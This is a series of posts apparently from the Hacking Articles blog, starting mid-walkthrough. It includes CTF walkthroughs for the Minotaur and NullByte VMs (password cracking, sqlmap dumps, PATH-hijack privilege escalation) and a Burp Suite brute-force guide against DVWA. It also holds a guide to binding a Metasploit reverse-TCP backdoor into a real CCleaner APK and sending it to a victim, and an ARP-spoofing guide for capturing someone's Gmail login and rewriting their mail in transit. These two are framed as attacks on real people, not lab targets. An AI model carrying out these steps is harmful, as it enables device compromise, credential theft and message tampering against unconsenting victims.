set rport 80

set targeturi /bull/

set wp_user buly

set wp_password Bighornedbulls

exploit

 As the exploit will run it will give you the session of meterpreter. Furthermore type,

shell

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Execution of the above commands will take you to the terminal of your target. Then moving forward enter the /var/www/html folder and type :

ls -lsa

We found a flag here, let’s read it.

cat flag.txt

Then we went into /tmp folder and rread the flag there:

cd /tmp

ls -lsa

cat flag.txt

Now we found two flags but they were not the main flags and also we got a hint that shadow.bak file could be useful to us. Let’s have look in it.

cat shadow.bak

We will take help of John password cracker to find the passwords:

john shadow.bak

We found the passwords for both heffer and minotaur. Please recall that port number 22 i.e. for ssh was open and we can use it to log in and for this type:

ssh heffer@192.168.56.223

Give the password when asked and further check its directories:

ls -lsa

We found a flag here. Read it.

cat flag.txt

Now in the flag we found another flag along with a hint indicating that the flag is Minotaur. Now we will log in through SSH using minotaur:

ssh minotaur@192.168.56.223

Give the password when asked. And then check for directories:

ls -lsa

There is another flag available. Again read it.

cat flag.txt

Now, we have finally found the first flag along with another hint that is the final flag is in /root/flag.txt

Moving on, type the following to gain admin access and switch user :

sudo su

cd ..

cd ..

This will take you into the home folder. Here, type :

cd root

ls -lsa

FInally we have fouond the last flag.

cat flag.txt

WOOHOO!!! The flag is captured. Congrats and enjoy!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Minotaur VM (CTF Challenge) appeared first on Hacking Articles.

In this article we will learn to prosecute dictionary attack from BurpSuite. And we will try and crack the password of DVWA Lab.

Burp Suite: Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. Importantly, it gives us another way to manage our attacks as the alternative to metasploit.

To make Burp Suite work, firstly, we have to turn on manual proxy and for that go to the settings and choose Preferences.

Then select advanced option and further go to Network then select Settings.

Now, select Manual proxy Configuration

And this way your manual proxy will be active as you can see below too.

Now, on the other hand open DVWA and log into it using its default username and password.

Once you log in, click on Brute Force. And also make sure that security is low or medium.

When you click on brute force, it will ask you the username and password. Here, before giving username and password open burp suite and select Proxy tab and turn on interception by clicking on Interception is on/off tab.

As you turn on the interception, then give any password you like just so that the burp suite can capture it.

Send the captured material to the intruder by right clicking on the space and choosing Send to Intruder option or simply press ctrl + i

Now open the Intruder tab then select Positions tab and following will be visible:

Choose the Attack type as Cluster Bomb.

Now select username and password as shown below:

In the above image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

So now, go to Payloads tab and the select 1 from Payload set (this ‘1’ denotes the username file). Then click on Load button and browse and select your dictionary file for username.

Now select 2 in the Payload set and again similar give the dictionary file for the password.

Now all you have to do is go to Intruder menu and select Start attack from the drop down menu.

Sit back and relax because now the burp suite will do its work and match the username and password and will give you the correct password and username. The moment it will find the correct value, it will change the value of length as shown:

And to confirm it from the response as it will be “Welcome to the password protected area admin”

And this way its all done.

Shivam Gupta is An Ethical Hacker, Cyber Security Expert, Penetration Tester, India. you can contact here

The post Brute Force Website Login Page using Burpsuite (Beginner Guide) appeared first on Hacking Articles.

Sometimes in hacking we have to use most genuine way so that victim is surely hacked. These genuine ways are to be used for our advantage. One of the most genuine ways to hack an android phone is to bind original android file to your backdoor-apk. This backdoor-apk is software which helps us to bind original apk file with your virus. Hence, taking all the suspicious away from you.

And for this first you have to execute the following command:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Once the command is execution and installation is done then downloads the backdoor-apk from github and for that type:

git clone https://github.com/dana-at-cp/backdoor-apk.git

As the software is downloaded, go to the www.apk4fun.com website and download an original apk file like I downloaded ccleaner. And then copy it in the backdoor-apk folder.

Open it in the terminal and type:

./backdoor-apk.sh ccleaner.apk

As the command runs it will ask you for the payload you want to use and for that select 3 and then it will ask you for lhost and lport and give these respectively.

The above commands will bind the file to the original apk file and will save it to backdoor-apk>original>dist folder.

Now all you have to do is send the file to the victim as he will install it by clicking on next.

And the click on Install to install the app.

This way the app will be downloaded.

Before opening the app,open metasploit and type :

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.126

set lport 4444

exploit

After this when you run the app; you will get meterpreter session.

Hence hacking the victim genuinely.

The post Hack Android Phone using Backdoor Apk appeared first on Hacking Articles.

This is our article of root2boot penetration testing challenge. We will walk through a exploitable framework of NullByte VM. Breaking into it isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. We have to find “Proof.txt” and follow the further steps.

 WalkThrough

 Start off by finding your target.

netdiscover

Our target is 192.168.1.142. And now that we know our target, we will scan it using nmap.

nmap -p-  -A 192.168.1.142

Scanning the IP, we will know that the port number 80, 111, 777, 44607 are open. Please observe here that the service of SSH is forwarded from 22 to 777 port. This port may come in handy in the future to gain access.

Now we will try and open the targeted IP in the browser.

There is an image and a quote on the page. You will find nothing on the page source or otherwise. But there might be something hidden in the image and so, we will read the image using exif tool.

exiftool main.gif

There you will find a comment kzMb5nVYJw. Now this might be a directory and there is no harm in opening it the browser so let’s do that

Our assumption was right as it opened in the browser. But it is asking for a key. And we have no idea what the key is so therefore we will use dictionary attack to find the key using BurpSuite and rockyou.txt.

Through the dictionary attack you will find the key i.e. elite.

Enter the key where it was asking and the following page will open.

It is asking for username now which again we do not know. So, we will find it in its Database using sqlmap. And for this type:

sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 –dbs

It will give you the name of the databse i.e. seth.  Now further we will find columns and tables and for that type:

sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 –dump –columns –tables -D seth

Once command executes, it will show you the table name along with column and password as shown:

As a result we have username and password but the password is in MD5 so we need to crack it and there are many online tools to do so. Therefore to crack it go to md5coder.org and give the md5 value there and click on ok and it will show you the original word i.e. omega

Now we will SSH to log in and for that type:

ssh ramses@192.168.1.142 -p 777

And then give omega as password. And you are logged in. As you are now logged in type the following command to see the list of directories:

ls -lsa

Then read .bash_history file by typing:

cat .bash_history

As we found nothing in there, we will move onto /var/www/backup by typing:

cd /var/www/bakcup/

ls -lsa

./procwatch

After much more exploring here and there and after number of useless attempts we had an idea that if we change the path of ps file to sh so that procwatch runs sh file instead of ps. And if we achieve this, we will directly reach root. Therefore, to achieve this we will have to manipulate the environment and for this we will copy the current shell executable (/bin/sh) into /tmp and for this follow the steps below:

 cd /tmp

cp /bin/sh /tmp/ps

export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

cd /var/www/backup

./procwatch

With us execution of above commands we will enter root and then further type ;

 id

cd /root

ls

cat proof.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the NullByte VM (CTF Challenge) appeared first on Hacking Articles.

There are various vibrant attacks of burpsuite that many not know off; therefore we will try one for those in this article today. We will learn how to get between the networks of gmail and then to change the message o the mail before it reaches receiver.

First of all, go to the terminal of Kali and type:

arspoof -i wlan0 -t 192.168.100.4 192.168.100.1

Here,

-i –> interface

wlan0 –> network (This can be either ethernet or wlan depending on your victim i.e. if your victim is using eth0 then you should also use eth0)

-t –> target

192.168.100.4 –> Victim IP

192.168.100.1 –> DNS

Execution of the above command will capture the packets that are sent from victim to router. And once we have captured these packets we will open another terminal in Kali and type the following command which will make us capture all the packets from router to victim.

arpspoof -i wlan0 -t 192.168.100.1 192.168.100.4

Here,

-i –> interface

wlan0 –> network

-t –> target

192.168.100.1 –> DNS

192.168.100.4 –> victim IP

This command will capture packets that are sent from router to victim IP. Now type the following the command so that IP forwarding is enabled in our PC.

echo 1 > /proc/sys/net/ipv4/ip_forward

Then type the following the command so that all the packets on port 80 will go through our IP.

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to -desitination 192.168.100.5

Then type the following the command so that we can all the packets on port 443 will go from our IP.

iptables -t nat -A PREROUTING -p tcp –dport 443 -j DNAT –to -desitination 192.168.100.5

After all this is done then open burpsuite and go to proxy tab and then select options tab. Once you have reached here click on Add button.

Clicking on Add button will make the following options appear. In this give port no 80 in the box adjacent to bind to port and in specific address give your IP.

Further on, Select Request Handling tab and check Support invisible proxy. And then click on ok.

Repeat the above steps for Port no 443 too.

After clicking on ok make sure all the boxes of running and invisible are check.

When the victim will sign in his/her gmail account we have its data captured in burpsuite.

And all this captured data will contain username and password of the victim as shown below.

Here is the closer view to the username and password.

The victim will type and send the message without suspicion:

But as the victim will click on send button its mail will come to us before reaching destination.

Now you can change the text of the message by a simple left click on the message area and type your message as I changed HELLO THIS IS TESTING to YOU HAVE BEEN HACKED.

Once you change the message then click on Forward button on the top left side and the mail will go forward to its destination as shown below:

Shivam Gupta is An Ethical Hacker, Cyber Security Expert, Penetration Tester, India. you can contact here

The post Hijacking Gmail Message on Air using Burpsuite appeared first on Hacking Articles.